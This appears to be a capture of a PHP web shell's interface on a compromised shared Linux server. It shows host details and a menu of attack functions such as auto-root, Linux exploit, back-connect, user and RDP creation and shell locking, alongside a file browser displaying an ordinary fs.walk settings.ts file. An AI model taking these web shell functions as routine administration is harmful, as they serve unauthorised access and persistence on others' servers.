Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@nodelib /
fs.walk /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
providers
[ DIR ]
drwxr-xr-x
readers
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
index.spec.ts
3.39
KB
-rw-r--r--
index.ts
1.99
KB
-rw-r--r--
settings.spec.ts
1.04
KB
-rw-r--r--
settings.ts
1.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.ts
import * as path from 'path'; import * as fsScandir from '@nodelib/fs.scandir'; import { Entry, Errno } from './types'; export type FilterFunction<T> = (value: T) => boolean; export type DeepFilterFunction = FilterFunction<Entry>; export type EntryFilterFunction = FilterFunction<Entry>; export type ErrorFilterFunction = FilterFunction<Errno>; export type Options = { basePath?: string; concurrency?: number; deepFilter?: DeepFilterFunction; entryFilter?: EntryFilterFunction; errorFilter?: ErrorFilterFunction; followSymbolicLinks?: boolean; fs?: Partial<fsScandir.FileSystemAdapter>; pathSegmentSeparator?: string; stats?: boolean; throwErrorOnBrokenSymbolicLink?: boolean; }; export default class Settings { public readonly basePath?: string = this._getValue(this._options.basePath, undefined); public readonly concurrency: number = this._getValue(this._options.concurrency, Infinity); public readonly deepFilter: DeepFilterFunction | null = this._getValue(this._options.deepFilter, null); public readonly entryFilter: EntryFilterFunction | null = this._getValue(this._options.entryFilter, null); public readonly errorFilter: ErrorFilterFunction | null = this._getValue(this._options.errorFilter, null); public readonly pathSegmentSeparator: string = this._getValue(this._options.pathSegmentSeparator, path.sep); public readonly fsScandirSettings: fsScandir.Settings = new fsScandir.Settings({ followSymbolicLinks: this._options.followSymbolicLinks, fs: this._options.fs, pathSegmentSeparator: this._options.pathSegmentSeparator, stats: this._options.stats, throwErrorOnBrokenSymbolicLink: this._options.throwErrorOnBrokenSymbolicLink }); constructor(private readonly _options: Options = {}) { } private _getValue<T>(option: T | undefined, value: T): T { return option ?? value; } }
Close